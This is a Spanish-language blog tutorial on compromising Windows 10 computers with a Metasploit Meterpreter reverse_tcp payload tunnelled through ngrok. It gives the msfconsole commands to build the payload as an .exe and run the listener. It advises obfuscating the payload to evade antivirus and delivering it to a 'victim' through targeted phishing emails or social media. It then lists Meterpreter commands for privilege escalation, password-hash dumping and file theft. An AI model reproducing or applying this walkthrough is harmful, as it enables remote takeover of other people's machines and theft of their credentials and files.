🔥Adquiere tu membresía:  acceso a todos los cursos, videos eliminados, contenidos protegidos, manuales y más. >> Ver Más

Cómo hackear Windows 10 con Metasploit y Ngrok

El uso de payloads de Metasploit combinadas con Ngrok es un método poderoso para realizar pruebas de penetración en máquinas con Windows 10.

Introducción

Hoy, echaremos un vistazo a algunas de las herramientas más útiles en ciberseguridad para pruebas de penetración remotas. Desarrollaremos un payload personalizado capaz de acceder y controlar de forma remota una computadora a través de Meterpreter, un generador de payloads del increíble arsenal de herramientas de Metasploit.

La primera vez que intenté hackear una computadora como esta, me tomó alrededor de 6 horas encontrar los recursos adecuados. Si se sigue correctamente, este artículo te permite obtener acceso en 6 minutos.

Paso 1: Instalar Metasploit

Para seguir esta guía, deberás instalar Metasploit. Metasploit, creado por Rapid7 , es una herramienta de hacking increíblemente popular que se utiliza para el desarrollo y la ejecución de exploits. Puedes descargar la última versión de Metasploit desde el sitio web oficial o desde la página Github de Rapid7.

Paso 2: Instalar Ngrok

Ngrok es una herramienta que te permite crear un túnel seguro desde Internet hasta tu máquina local. Esto es útil para probar exploits y payloads que requieren una conexión desde Internet a tu laboratorio de pruebas. También es muy útil si estás tratando de hackear a alguien al otro lado del mundo .

Puedes descargar ngrok desde el sitio web oficial aquí.

Paso 3: Localización de vulnerabilidades potenciales

Una vez que hayas instalado Metasploit y Ngrok, el siguiente paso es encontrar una vulnerabilidad para explotar. Existen numerosos recursos disponibles en la web que enumeran vulnerabilidades comunes en diferentes sistemas operativos y software.

Uno de esos recursos es la base de datos de vulnerabilidad nacional (NVD), que es mantenida por el Instituto Nacional de Estándares y Tecnología (NIST). Puedes buscar la NVD aquí.

Paso 4: Determinación de un payload

Una vez que hayas identificado una vulnerabilidad, puedes usar Metasploit para elegir un payload. Metasploit contiene una tonelada de payloads que pueden usarse para atacar todo tipo de sistemas. Para este método, utilizaremos el payload reverse_tcp, que crea una conexión desde el sistema de la víctima hasta tu laboratorio de pruebas.

Para elegir un payload en Metasploit, escribe el siguiente comando:

msf > use [payload]

Reemplaza ‘[payload]‘ con el nombre del payload que deseas usar. Por ejemplo, para elegir el payload reverse_tcp, puedes usar el siguiente comando:

msf > use payload/windows/meterpreter/reverse_tcp

Paso 5: configurar tu payload

Una vez que hayas elegido un payload, deberás configurarlo para apuntar al sistema de tu víctima . Esto puede implicar configurar la dirección IP y el puerto para volver a conectarse, según el payload utilizado. En este caso, estamos usando un payload TCP inverso popular, que requiere una dirección y un puerto para volver a conectarse. Sin embargo, dependiendo de la complejidad del exploit, el payload puede requerir una variedad de otras opciones.

Para configurar la dirección IP para volver a hacer un túnel (la IP de ngrok), debes usar el comando set LHOST, seguido de la dirección IP de tu túnel ngrok,que reenvía a nuestra dirección de home 127.0.0.1 . Esto ejecuta el comando ‘ngrok tcp 4444' y usa el comando ‘ping‘ en el dominio provisto para obtener la IP.

msf > set LHOST *.*.*.* (e.x. 132.53.24.12)

Para establecer el puerto de destino, tienes que utilizar ‘set LPORT‘, seguido del número de puerto.

msf > set LPORT 4444

Puedes ver la lista completa de opciones disponibles para tu payload usando el comando show options:

msf > show options

Esto mostrará una lista de opciones que se pueden configurar para tu payload, junto con sus valores actuales .

Paso 6: Generar el propio malware

Una vez que hayas configurado tu payload, puedes generar el malware usando el comando generate:

msf > generate -t exe -f /path/to/output/file.exe

Esto generará un archivo ejecutable (.exe ) que puedes enviar a tu víctima, pero hay muchos otros tipos de archivos que puedes generar (como los archivos de Python [.py]). Incluso puedes generar tu payload como shellcode, y luego ofuscarlo usando otros programas para que los antivirus en Windows no lo detecten.

Paso 7: Entregar el malware a tu víctima

Ahora que has generado el malware, debes enviarlo a tu víctima. Puedes hacer esto a través de medios como correo electrónico, redes sociales, o incluso una entrega física. Personalmente, encuentro que si el ataque requiere ingeniería social, es mejor construir un correo electrónico especializado después de haber investigado al objetivo. Lo más importante es asegurarse de que tu víctima haga clic en el malware y lo ejecute en su sistema.

Paso 8: Iniciar el oyente en Metasploit (antes de que la víctima ejecute su malware)

Una vez que la víctima haya ejecutado el malware, lo harás establecer una conexión de vuelta a tu laboratorio de pruebas. Para recibir esta conexión, debes iniciar un oyente en Metasploit.

Para iniciar un oyente, debes usar el comando exploit/multi/handler, seguido del payload que estás usando. Por ejemplo:

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 127.0.0.1
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit

Esto iniciará al oyente y esperará una conexión del sistema de la víctima.

Paso 9: Acceder al sistema de la víctima

Una vez que el sistema de la víctima se haya conectado a tu oyente, tendrás acceso a su sistema a través de la shell de Meterpreter. Si ves un ‘meterpreter’ en lugar de un ‘msf exploit(handler)’, tendrás permisos suficientes para ejecutar comandos, subir y descargar archivos, y realizar una variedad de otras acciones.

Para obtener una lista de comandos disponibles, debes usar el comando help:

meterpreter > help

Esto mostrará una lista de comandos disponibles que puedes usar para interactuar con el sistema de la víctima. Si no estás familiarizado con Meterpreter, algunos de los comandos con los que deberías experimentar son los siguientes: 

  • sysinfo: Este comando muestra información sobre el sistema de la víctima, incluido el sistema operativo, la arquitectura y el lenguaje del sistema.
  • getuid: Este comando muestra el ID de usuario de la sesión actual de meterpreter.
  • getsystem: Este comando intenta escalar la sesión de meterpreter a privilegios de nivel de SYSTEM. Esto puede ser útil si deseas obtener un mayor acceso al sistema de la víctima.
  • hashdump: Este comando recupera los hash de contraseña LM y NTLM del sistema de la víctima. Esto puede ser útil para descifrar los hashes y obtener acceso a la contraseña de la víctima.
  • upload: Este comando te permite cargar un archivo desde tu sistema al sistema de la víctima.
  • download: Este comando te permite descargar un archivo del sistema de la víctima a tu sistema.
  • execute: Este comando te permite ejecutar un programa en el sistema de la víctima.
  • migrate: Este comando te permite migrar la sesión de meterpreter a un proceso diferente en el sistema de la víctima. Esto puede ser útil si el proceso actual se termina o se vuelve inestable.

Estos son solo un par de ejemplos de la plétora de comandos disponibles en la shell de Meterpreter. Puedes encontrar una lista completa de comandos consultando la Documentación de Metasploit en el sitio web Rapid7.

Deja un comentario

Adquiere tu Membresía Anual Wiser

Adquiere tu Membresía Anual Wiser y adquiere grandes beneficios

Más información